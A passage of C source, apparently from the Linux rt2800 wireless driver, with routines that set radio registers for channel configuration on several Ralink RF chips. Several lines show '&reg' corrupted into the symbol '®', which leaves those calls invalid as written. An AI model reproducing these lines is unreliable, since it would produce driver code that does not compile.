rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR6_R1, rf->rf2);
rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 12, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR12_TX_POWER, info->default_power1);
rt2800_rfcsr_write(rt2x00dev, 12, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 13, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR13_TX_POWER, info->default_power2);
rt2800_rfcsr_write(rt2x00dev, 13, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD,
rt2x00dev->default_ant.rx_chain_num <= 1);
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD,
rt2x00dev->default_ant.rx_chain_num <= 2);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD,
rt2x00dev->default_ant.tx_chain_num <= 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD,
rt2x00dev->default_ant.tx_chain_num <= 2);
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 23, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR23_FREQ_OFFSET, rt2x00dev->freq_offset);
rt2800_rfcsr_write(rt2x00dev, 23, rfcsr);
if (rt2x00_rt(rt2x00dev, RT3390)) {
calib_tx = conf_is_ht40(conf) ? 0x68 : 0x4f;
calib_rx = conf_is_ht40(conf) ? 0x6f : 0x4f;
} else {
if (conf_is_ht40(conf)) {
calib_tx = drv_data->calibration_bw40;
calib_rx = drv_data->calibration_bw40;
} else {
calib_tx = drv_data->calibration_bw20;
calib_rx = drv_data->calibration_bw20;
}
}
rt2800_rfcsr_read(rt2x00dev, 24, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR24_TX_CALIB, calib_tx);
rt2800_rfcsr_write(rt2x00dev, 24, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 31, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR31_RX_CALIB, calib_rx);
rt2800_rfcsr_write(rt2x00dev, 31, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR7_RF_TUNING, 1);
rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR30_RF_CALIBRATION, 1);
rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
msleep(1);
rt2x00_set_field8(&rfcsr, RFCSR30_RF_CALIBRATION, 0);
rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
}
static void rt2800_config_channel_rf3052(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u8 rfcsr;
u32 reg;
if (rf->channel <= 14) {
rt2800_bbp_write(rt2x00dev, 25, drv_data->bbp25);
rt2800_bbp_write(rt2x00dev, 26, drv_data->bbp26);
} else {
rt2800_bbp_write(rt2x00dev, 25, 0x09);
rt2800_bbp_write(rt2x00dev, 26, 0xff);
}
rt2800_rfcsr_write(rt2x00dev, 2, rf->rf1);
rt2800_rfcsr_write(rt2x00dev, 3, rf->rf3);
rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR6_R1, rf->rf2);
if (rf->channel <= 14)
rt2x00_set_field8(&rfcsr, RFCSR6_TXDIV, 2);
else
rt2x00_set_field8(&rfcsr, RFCSR6_TXDIV, 1);
rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 5, &rfcsr);
if (rf->channel <= 14)
rt2x00_set_field8(&rfcsr, RFCSR5_R1, 1);
else
rt2x00_set_field8(&rfcsr, RFCSR5_R1, 2);
rt2800_rfcsr_write(rt2x00dev, 5, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 12, &rfcsr);
if (rf->channel <= 14) {
rt2x00_set_field8(&rfcsr, RFCSR12_DR0, 3);
rt2x00_set_field8(&rfcsr, RFCSR12_TX_POWER,
info->default_power1);
} else {
rt2x00_set_field8(&rfcsr, RFCSR12_DR0, 7);
rt2x00_set_field8(&rfcsr, RFCSR12_TX_POWER,
(info->default_power1 & 0x3) |
((info->default_power1 & 0xC) << 1));
}
rt2800_rfcsr_write(rt2x00dev, 12, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 13, &rfcsr);
if (rf->channel <= 14) {
rt2x00_set_field8(&rfcsr, RFCSR13_DR0, 3);
rt2x00_set_field8(&rfcsr, RFCSR13_TX_POWER,
info->default_power2);
} else {
rt2x00_set_field8(&rfcsr, RFCSR13_DR0, 7);
rt2x00_set_field8(&rfcsr, RFCSR13_TX_POWER,
(info->default_power2 & 0x3) |
((info->default_power2 & 0xC) << 1));
}
rt2800_rfcsr_write(rt2x00dev, 13, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 0);
if (rt2x00_has_cap_bt_coexist(rt2x00dev)) {
if (rf->channel <= 14) {
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 1);
}
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 1);
} else {
switch (rt2x00dev->default_ant.tx_chain_num) {
case 1:
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
case 2:
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 1);
break;
}
switch (rt2x00dev->default_ant.rx_chain_num) {
case 1:
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
case 2:
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 1);
break;
}
}
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 23, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR23_FREQ_OFFSET, rt2x00dev->freq_offset);
rt2800_rfcsr_write(rt2x00dev, 23, rfcsr);
if (conf_is_ht40(conf)) {
rt2800_rfcsr_write(rt2x00dev, 24, drv_data->calibration_bw40);
rt2800_rfcsr_write(rt2x00dev, 31, drv_data->calibration_bw40);
} else {
rt2800_rfcsr_write(rt2x00dev, 24, drv_data->calibration_bw20);
rt2800_rfcsr_write(rt2x00dev, 31, drv_data->calibration_bw20);
}
if (rf->channel <= 14) {
rt2800_rfcsr_write(rt2x00dev, 7, 0xd8);
rt2800_rfcsr_write(rt2x00dev, 9, 0xc3);
rt2800_rfcsr_write(rt2x00dev, 10, 0xf1);
rt2800_rfcsr_write(rt2x00dev, 11, 0xb9);
rt2800_rfcsr_write(rt2x00dev, 15, 0x53);
rfcsr = 0x4c;
rt2x00_set_field8(&rfcsr, RFCSR16_TXMIXER_GAIN,
drv_data->txmixer_gain_24g);
rt2800_rfcsr_write(rt2x00dev, 16, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 17, 0x23);
rt2800_rfcsr_write(rt2x00dev, 19, 0x93);
rt2800_rfcsr_write(rt2x00dev, 20, 0xb3);
rt2800_rfcsr_write(rt2x00dev, 25, 0x15);
rt2800_rfcsr_write(rt2x00dev, 26, 0x85);
rt2800_rfcsr_write(rt2x00dev, 27, 0x00);
rt2800_rfcsr_write(rt2x00dev, 29, 0x9b);
} else {
rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR7_BIT2, 1);
rt2x00_set_field8(&rfcsr, RFCSR7_BIT3, 0);
rt2x00_set_field8(&rfcsr, RFCSR7_BIT4, 1);
rt2x00_set_field8(&rfcsr, RFCSR7_BITS67, 0);
rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 9, 0xc0);
rt2800_rfcsr_write(rt2x00dev, 10, 0xf1);
rt2800_rfcsr_write(rt2x00dev, 11, 0x00);
rt2800_rfcsr_write(rt2x00dev, 15, 0x43);
rfcsr = 0x7a;
rt2x00_set_field8(&rfcsr, RFCSR16_TXMIXER_GAIN,
drv_data->txmixer_gain_5g);
rt2800_rfcsr_write(rt2x00dev, 16, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 17, 0x23);
if (rf->channel <= 64) {
rt2800_rfcsr_write(rt2x00dev, 19, 0xb7);
rt2800_rfcsr_write(rt2x00dev, 20, 0xf6);
rt2800_rfcsr_write(rt2x00dev, 25, 0x3d);
} else if (rf->channel <= 128) {
rt2800_rfcsr_write(rt2x00dev, 19, 0x74);
rt2800_rfcsr_write(rt2x00dev, 20, 0xf4);
rt2800_rfcsr_write(rt2x00dev, 25, 0x01);
} else {
rt2800_rfcsr_write(rt2x00dev, 19, 0x72);
rt2800_rfcsr_write(rt2x00dev, 20, 0xf3);
rt2800_rfcsr_write(rt2x00dev, 25, 0x01);
}
rt2800_rfcsr_write(rt2x00dev, 26, 0x87);
rt2800_rfcsr_write(rt2x00dev, 27, 0x01);
rt2800_rfcsr_write(rt2x00dev, 29, 0x9f);
}
rt2800_register_read(rt2x00dev, GPIO_CTRL, ®);
rt2x00_set_field32(®, GPIO_CTRL_DIR7, 0);
if (rf->channel <= 14)
rt2x00_set_field32(®, GPIO_CTRL_VAL7, 1);
else
rt2x00_set_field32(®, GPIO_CTRL_VAL7, 0);
rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);
rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR7_RF_TUNING, 1);
rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);
}
static void rt2800_config_channel_rf3053(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u8 txrx_agc_fc;
u8 txrx_h20m;
u8 rfcsr;
u8 bbp;
const bool txbf_enabled = false; /* TODO */
/* TODO: use TX{0,1,2}FinePowerControl values from EEPROM */
rt2800_bbp_read(rt2x00dev, 109, &bbp);
rt2x00_set_field8(&bbp, BBP109_TX0_POWER, 0);
rt2x00_set_field8(&bbp, BBP109_TX1_POWER, 0);
rt2800_bbp_write(rt2x00dev, 109, bbp);
rt2800_bbp_read(rt2x00dev, 110, &bbp);
rt2x00_set_field8(&bbp, BBP110_TX2_POWER, 0);
rt2800_bbp_write(rt2x00dev, 110, bbp);
if (rf->channel <= 14) {
/* Restore BBP 25 & 26 for 2.4 GHz */
rt2800_bbp_write(rt2x00dev, 25, drv_data->bbp25);
rt2800_bbp_write(rt2x00dev, 26, drv_data->bbp26);
} else {
/* Hard code BBP 25 & 26 for 5GHz */
/* Enable IQ Phase correction */
rt2800_bbp_write(rt2x00dev, 25, 0x09);
/* Setup IQ Phase correction value */
rt2800_bbp_write(rt2x00dev, 26, 0xff);
}
rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3 & 0xf);
rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR11_R, (rf->rf2 & 0x3));
rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR11_PLL_IDOH, 1);
if (rf->channel <= 14)
rt2x00_set_field8(&rfcsr, RFCSR11_PLL_MOD, 1);
else
rt2x00_set_field8(&rfcsr, RFCSR11_PLL_MOD, 2);
rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 53, &rfcsr);
if (rf->channel <= 14) {
rfcsr = 0;
rt2x00_set_field8(&rfcsr, RFCSR53_TX_POWER,
info->default_power1 & 0x1f);
} else {
if (rt2x00_is_usb(rt2x00dev))
rfcsr = 0x40;
rt2x00_set_field8(&rfcsr, RFCSR53_TX_POWER,
((info->default_power1 & 0x18) << 1) |
(info->default_power1 & 7));
}
rt2800_rfcsr_write(rt2x00dev, 53, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 55, &rfcsr);
if (rf->channel <= 14) {
rfcsr = 0;
rt2x00_set_field8(&rfcsr, RFCSR55_TX_POWER,
info->default_power2 & 0x1f);
} else {
if (rt2x00_is_usb(rt2x00dev))
rfcsr = 0x40;
rt2x00_set_field8(&rfcsr, RFCSR55_TX_POWER,
((info->default_power2 & 0x18) << 1) |
(info->default_power2 & 7));
}
rt2800_rfcsr_write(rt2x00dev, 55, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 54, &rfcsr);
if (rf->channel <= 14) {
rfcsr = 0;
rt2x00_set_field8(&rfcsr, RFCSR54_TX_POWER,
info->default_power3 & 0x1f);
} else {
if (rt2x00_is_usb(rt2x00dev))
rfcsr = 0x40;
rt2x00_set_field8(&rfcsr, RFCSR54_TX_POWER,
((info->default_power3 & 0x18) << 1) |
(info->default_power3 & 7));
}
rt2800_rfcsr_write(rt2x00dev, 54, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);
switch (rt2x00dev->default_ant.tx_chain_num) {
case 3:
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 1);
/* fallthrough */
case 2:
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
/* fallthrough */
case 1:
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 1);
break;
}
switch (rt2x00dev->default_ant.rx_chain_num) {
case 3:
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 1);
/* fallthrough */
case 2:
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
/* fallthrough */
case 1:
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 1);
break;
}
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_adjust_freq_offset(rt2x00dev);
if (conf_is_ht40(conf)) {
txrx_agc_fc = rt2x00_get_field8(drv_data->calibration_bw40,
RFCSR24_TX_AGC_FC);
txrx_h20m = rt2x00_get_field8(drv_data->calibration_bw40,
RFCSR24_TX_H20M);
} else {
txrx_agc_fc = rt2x00_get_field8(drv_data->calibration_bw20,
RFCSR24_TX_AGC_FC);
txrx_h20m = rt2x00_get_field8(drv_data->calibration_bw20,
RFCSR24_TX_H20M);
}
/* NOTE: the reference driver does not writes the new value
* back to RFCSR 32
*/
rt2800_rfcsr_read(rt2x00dev, 32, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR32_TX_AGC_FC, txrx_agc_fc);
if (rf->channel <= 14)
rfcsr = 0xa0;
else
rfcsr = 0x80;
rt2800_rfcsr_write(rt2x00dev, 31, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR30_TX_H20M, txrx_h20m);
rt2x00_set_field8(&rfcsr, RFCSR30_RX_H20M, txrx_h20m);
rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
/* Band selection */
rt2800_rfcsr_read(rt2x00dev, 36, &rfcsr);
if (rf->channel <= 14)
rt2x00_set_field8(&rfcsr, RFCSR36_RF_BS, 1);
else
rt2x00_set_field8(&rfcsr, RFCSR36_RF_BS, 0);
rt2800_rfcsr_write(rt2x00dev, 36, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 34, &rfcsr);
if (rf->channel <= 14)
rfcsr = 0x3c;
else
rfcsr = 0x20;
rt2800_rfcsr_write(rt2x00dev, 34, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 12, &rfcsr);
if (rf->channel <= 14)
rfcsr = 0x1a;
else
rfcsr = 0x12;
rt2800_rfcsr_write(rt2x00dev, 12, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
if (rf->channel >= 1 && rf->channel <= 14)
rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 1);
else if (rf->channel >= 36 && rf->channel <= 64)
rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 2);
else if (rf->channel >= 100 && rf->channel <= 128)
rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 2);
else
rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 1);
rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR30_RX_VCM, 2);
rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 46, 0x60);
if (rf->channel <= 14) {
rt2800_rfcsr_write(rt2x00dev, 10, 0xd3);
rt2800_rfcsr_write(rt2x00dev, 13, 0x12);
} else {
rt2800_rfcsr_write(rt2x00dev, 10, 0xd8);
rt2800_rfcsr_write(rt2x00dev, 13, 0x23);
}
rt2800_rfcsr_read(rt2x00dev, 51, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR51_BITS01, 1);
rt2800_rfcsr_write(rt2x00dev, 51, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 51, &rfcsr);
if (rf->channel <= 14) {
rt2x00_set_field8(&rfcsr, RFCSR51_BITS24, 5);
rt2x00_set_field8(&rfcsr, RFCSR51_BITS57, 3);
} else {
rt2x00_set_field8(&rfcsr, RFCSR51_BITS24, 4);
rt2x00_set_field8(&rfcsr, RFCSR51_BITS57, 2);
}
rt2800_rfcsr_write(rt2x00dev, 51, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 49, &rfcsr);
if (rf->channel <= 14)
rt2x00_set_field8(&rfcsr, RFCSR49_TX_LO1_IC, 3);
else
rt2x00_set_field8(&rfcsr, RFCSR49_TX_LO1_IC, 2);
if (txbf_enabled)
rt2x00_set_field8(&rfcsr, RFCSR49_TX_DIV, 1);
rt2800_rfcsr_write(rt2x00dev, 49, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR50_TX_LO1_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 57, &rfcsr);
if (rf->channel <= 14)
rt2x00_set_field8(&rfcsr, RFCSR57_DRV_CC, 0x1b);
else
rt2x00_set_field8(&rfcsr, RFCSR57_DRV_CC, 0x0f);
rt2800_rfcsr_write(rt2x00dev, 57, rfcsr);
if (rf->channel <= 14) {
rt2800_rfcsr_write(rt2x00dev, 44, 0x93);
rt2800_rfcsr_write(rt2x00dev, 52, 0x45);
} else {
rt2800_rfcsr_write(rt2x00dev, 44, 0x9b);
rt2800_rfcsr_write(rt2x00dev, 52, 0x05);
}
/* Initiate VCO calibration */
rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
if (rf->channel <= 14) {
rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
} else {
rt2x00_set_field8(&rfcsr, RFCSR3_BIT1, 1);
rt2x00_set_field8(&rfcsr, RFCSR3_BIT2, 1);
rt2x00_set_field8(&rfcsr, RFCSR3_BIT3, 1);
rt2x00_set_field8(&rfcsr, RFCSR3_BIT4, 1);
rt2x00_set_field8(&rfcsr, RFCSR3_BIT5, 1);
rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
}
rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);
if (rf->channel >= 1 && rf->channel <= 14) {
rfcsr = 0x23;
if (txbf_enabled)
rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 45, 0xbb);
} else if (rf->channel >= 36 && rf->channel <= 64) {
rfcsr = 0x36;
if (txbf_enabled)
rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
rt2800_rfcsr_write(rt2x00dev, 39, 0x36);
rt2800_rfcsr_write(rt2x00dev, 45, 0xeb);
} else if (rf->channel >= 100 && rf->channel <= 128) {
rfcsr = 0x32;
if (txbf_enabled)
rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 45, 0xb3);
} else {
rfcsr = 0x30;
if (txbf_enabled)
rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 45, 0x9b);
}
}
#define POWER_BOUND 0x27
#define POWER_BOUND_5G 0x2b
static void rt2800_config_channel_rf3290(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
u8 rfcsr;
rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3);
rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR11_R, rf->rf2);
rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 49, &rfcsr);
if (info->default_power1 > POWER_BOUND)
rt2x00_set_field8(&rfcsr, RFCSR49_TX, POWER_BOUND);
else
rt2x00_set_field8(&rfcsr, RFCSR49_TX, info->default_power1);
rt2800_rfcsr_write(rt2x00dev, 49, rfcsr);
rt2800_adjust_freq_offset(rt2x00dev);
if (rf->channel <= 14) {
if (rf->channel == 6)
rt2800_bbp_write(rt2x00dev, 68, 0x0c);
else
rt2800_bbp_write(rt2x00dev, 68, 0x0b);
if (rf->channel >= 1 && rf->channel <= 6)
rt2800_bbp_write(rt2x00dev, 59, 0x0f);
else if (rf->channel >= 7 && rf->channel <= 11)
rt2800_bbp_write(rt2x00dev, 59, 0x0e);
else if (rf->channel >= 12 && rf->channel <= 14)
rt2800_bbp_write(rt2x00dev, 59, 0x0d);
}
}
static void rt2800_config_channel_rf3322(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
u8 rfcsr;
rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3);
rt2800_rfcsr_write(rt2x00dev, 11, 0x42);
rt2800_rfcsr_write(rt2x00dev, 12, 0x1c);
rt2800_rfcsr_write(rt2x00dev, 13, 0x00);
if (info->default_power1 > POWER_BOUND)
rt2800_rfcsr_write(rt2x00dev, 47, POWER_BOUND);
else
rt2800_rfcsr_write(rt2x00dev, 47, info->default_power1);
if (info->default_power2 > POWER_BOUND)
rt2800_rfcsr_write(rt2x00dev, 48, POWER_BOUND);
else
rt2800_rfcsr_write(rt2x00dev, 48, info->default_power2);
rt2800_adjust_freq_offset(rt2x00dev);
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 1);
if ( rt2x00dev->default_ant.tx_chain_num == 2 )
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
else
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 0);
if ( rt2x00dev->default_ant.rx_chain_num == 2 )
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
else
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 0);
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 31, 80);
}
static void rt2800_config_channel_rf53xx(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
u8 rfcsr;
rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3);
rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR11_R, rf->rf2);
rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 49, &rfcsr);
if (info->default_power1 > POWER_BOUND)
rt2x00_set_field8(&rfcsr, RFCSR49_TX, POWER_BOUND);
else
rt2x00_set_field8(&rfcsr, RFCSR49_TX, info->default_power1);
rt2800_rfcsr_write(rt2x00dev, 49, rfcsr);
if (rt2x00_rt(rt2x00dev, RT5392)) {
rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
if (info->default_power2 > POWER_BOUND)
rt2x00_set_field8(&rfcsr, RFCSR50_TX, POWER_BOUND);
else
rt2x00_set_field8(&rfcsr, RFCSR50_TX,
info->default_power2);
rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);
}
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
if (rt2x00_rt(rt2x00dev, RT5392)) {
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
}
rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 1);
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_adjust_freq_offset(rt2x00dev);
if (rf->channel <= 14) {
int idx = rf->channel-1;
if (rt2x00_has_cap_bt_coexist(rt2x00dev)) {
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F)) {
/* r55/r59 value array of channel 1~14 */
static const char r55_bt_rev[] = {0x83, 0x83,
0x83, 0x73, 0x73, 0x63, 0x53, 0x53,
0x53, 0x43, 0x43, 0x43, 0x43, 0x43};
static const char r59_bt_rev[] = {0x0e, 0x0e,
0x0e, 0x0e, 0x0e, 0x0b, 0x0a, 0x09,
0x07, 0x07, 0x07, 0x07, 0x07, 0x07};
rt2800_rfcsr_write(rt2x00dev, 55,
r55_bt_rev[idx]);
rt2800_rfcsr_write(rt2x00dev, 59,
r59_bt_rev[idx]);
} else {
static const char r59_bt[] = {0x8b, 0x8b, 0x8b,
0x8b, 0x8b, 0x8b, 0x8b, 0x8a, 0x89,
0x88, 0x88, 0x86, 0x85, 0x84};
rt2800_rfcsr_write(rt2x00dev, 59, r59_bt[idx]);
}
} else {
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F)) {
static const char r55_nonbt_rev[] = {0x23, 0x23,
0x23, 0x23, 0x13, 0x13, 0x03, 0x03,
0x03, 0x03, 0x03, 0x03, 0x03, 0x03};
static const char r59_nonbt_rev[] = {0x07, 0x07,
0x07, 0x07, 0x07, 0x07, 0x07, 0x07,
0x07, 0x07, 0x06, 0x05, 0x04, 0x04};
rt2800_rfcsr_write(rt2x00dev, 55,
r55_nonbt_rev[idx]);
rt2800_rfcsr_write(rt2x00dev, 59,
r59_nonbt_rev[idx]);
} else if (rt2x00_rt(rt2x00dev, RT5390) ||
rt2x00_rt(rt2x00dev, RT5392)) {
static const char r59_non_bt[] = {0x8f, 0x8f,
0x8f, 0x8f, 0x8f, 0x8f, 0x8f, 0x8d,
0x8a, 0x88, 0x88, 0x87, 0x87, 0x86};
rt2800_rfcsr_write(rt2x00dev, 59,
r59_non_bt[idx]);
}
}
}
}
static void rt2800_config_channel_rf55xx(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
u8 rfcsr, ep_reg;
u32 reg;
int power_bound;
/* TODO */
const bool is_11b = false;
const bool is_type_ep = false;
rt2800_register_read(rt2x00dev, LDO_CFG0, ®);
rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL,
(rf->channel > 14 || conf_is_ht40(conf)) ? 5 : 0);
rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
/* Order of values on rf_channel entry: N, K, mod, R */
rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1 & 0xff);
rt2800_rfcsr_read(rt2x00dev, 9, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR9_K, rf->rf2 & 0xf);
rt2x00_set_field8(&rfcsr, RFCSR9_N, (rf->rf1 & 0x100) >> 8);
